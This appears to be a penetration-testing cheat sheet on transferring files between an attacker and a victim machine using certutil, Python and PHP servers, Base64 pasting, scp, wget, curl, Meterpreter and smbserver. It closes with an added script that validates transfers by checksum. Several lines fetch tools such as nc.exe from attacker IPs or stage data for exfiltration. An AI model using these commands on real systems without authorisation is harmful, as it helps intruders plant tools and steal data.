File Transfer - Quick Commands

Certutil (Windows)


Certutil.exe -urlcache -f http://10.10.10.10/file.txt file.txt
certutil.exe -verifyctl -split -f http://10.10.10.32:8000/nc.exe

Python


HTTP

# Python3: opens port 80 as an HTTP server to exfil data
$ python3 -m http.server 80

# Python2 
$ python -m SimpleHTTPServer 80

You can navigate to the IP and port 80 (or whatever port you set) and browse the directory.

You can chain this with certutil: stand up the HTTP server on the attacker machine, then use certutil to transfer tools over to the victim machine (Windows).

FTP

# Attacker machine
# Python2
$ python -m pyftpdlib 21

# Python3
$ python3 -m pyftpdlib -p 21 --write

# Windows Machine (victim)
>ftp {Attacker IP}

PHP


$ sudo php -S 0.0.0.0:80
PHP 7.4.15 Development Server (http://0.0.0.0:80) started

Base64


In some cases, we may not be able to transfer the file. For example, the remote host may have firewall protections that prevent us from downloading a file from our machine. In this type of situation, we can use a simple trick: base64 encode the file, paste the base64 string on the remote server, and decode it there. For example, if we wanted to transfer a binary file called shell, we can base64 encode it as follows:

# Get the Base64 of the file
$ base64 shell -w 0

Now copy the base64 string, go to the remote host, decode it, and redirect the output into a file:

$ echo {base64 string} | base64 -d > shell

SCP (Requires SSH Access)


To use Secure Copy (SCP):

$ scp linenum.sh user@remotehost:/tmp/linenum.sh
  • linenum.sh: This is the file to transfer

  • /tmp/linenum.sh: The destination directory and filename for the transferred file, which you must specify

To use scp with an ssh access key:

scp -i <ssh_key> <file to transfer> user@<remotehost>:/home/user/filename

To transfer a directory:

$ scp -i id_rsa -r <Directory> adminuser@10.10.155.5:/home/adminuser/<Directory>

Wget (Linux)


Downloading a file and saving it with a specific name:

$ wget -O myfile.zip https://example.com/file.zip

Resuming a download:

If a download is interrupted, you can resume it with the -c option:

$ wget -c https://example.com/largefile.zip

Downloading multiple files:

$ wget https://example.com/file1.zip https://example.com/file2.zip

Downloading in the Background:

To download a file in the background (i.e., without holding up your terminal), use the -b option:

$ wget -b <URL>

Adjusting Speed Limit:

If needed, you can limit the download speed with --limit-rate:

$ wget --limit-rate=<rate> <URL>

Additional Options

  • Verbose Mode: Use -v to enable verbose output, showing detailed information about the download process.

  • User Authentication: Use --user and --password options for sites requiring authentication.

  • Using Proxy: Use --proxy-user and --proxy-password for proxy authentication.

cURL


If you are on a compromised machine you can use:

curl <ip of attacker>:<port python server is running>/<filename> -o /<dir on victim>/filename

Example transferring over nmap and changing permissions of the file:

curl ATTACKING_IP/nmap -o /tmp/nmap-USERNAME && chmod +x /tmp/nmap-USERNAME

Metasploit


Meterpreter has an upload/download feature, so if we have a meterpreter shell it is very easy to upload or download a file.

SMBServer.py


Run smbserver.py, and set the shareName and sharePath:

$ smbserver.py p .
  • smbserver.py: Refers to the smbserver.py script, which is part of the Impacket toolkit. This script allows you to create an SMB server.

  • p: share name that will be created and can be accessed

  • .: The dot represents the current directory. It specifies the path to the directory that you want to share as an SMB share. In this case, it means the current directory in which you are running the command.

Now from the Windows machine on the same network, you can copy from the share you set up on the Kali box:

copy \\<Kali IP>\p\<filename>

Validating File Transfers


To validate the format of a file, we can run the file command on it:
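
The validation step, as an added example that is not from the original page: it round-trips a constructed sample file through the Base64 method above, then checks the result with file and a SHA-256 comparison against the digest recorded on the sending side. The function names and sample file are assumptions for the demo, and it expects GNU coreutils (base64 -w, sha256sum).

```shell
#!/bin/sh
# Added example: validate a file moved with the Base64 copy-paste method.
# Function names and the sample payload are constructed for this demo.

sha256_of() {            # print only the hex digest of a file
    sha256sum "$1" | cut -d' ' -f1
}

encode_file() {          # sender: file -> single-line Base64
    base64 -w 0 "$1"
}

decode_to() {            # receiver: decode_to <b64 string> <outfile>
    printf '%s' "$1" | base64 -d > "$2"
}

verify_transfer() {      # verify_transfer <file> <expected sha256>
    actual=$(sha256_of "$1")
    if [ "$actual" != "$2" ]; then
        echo "FAIL $1 expected=$2 actual=$actual"
        return 1
    fi
    kind="(file not installed)"
    if command -v file >/dev/null 2>&1; then kind=$(file -b "$1"); fi
    echo "OK   $1: $kind"
}

run_demo() {             # prints two results, then "<good> <cut>" statuses
    dir=$(mktemp -d) || return 2
    # Constructed sample standing in for the script being transferred
    printf '#!/bin/sh\necho "enumeration helper"\n' > "$dir/src.sh"
    want=$(sha256_of "$dir/src.sh")      # recorded on the sending host
    b64=$(encode_file "$dir/src.sh")

    decode_to "$b64" "$dir/good.sh"
    if verify_transfer "$dir/good.sh" "$want"; then good=0; else good=1; fi

    # A paste that lost its last 4 characters is still valid Base64, so
    # base64 -d succeeds and only the digest reveals the short file.
    decode_to "${b64%????}" "$dir/cut.sh"
    if verify_transfer "$dir/cut.sh" "$want"; then cut=0; else cut=1; fi

    rm -rf "$dir"
    echo "$good $cut"
}

run_demo
```

The file command only confirms the detected format; the digest comparison is what catches a truncated or altered copy.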
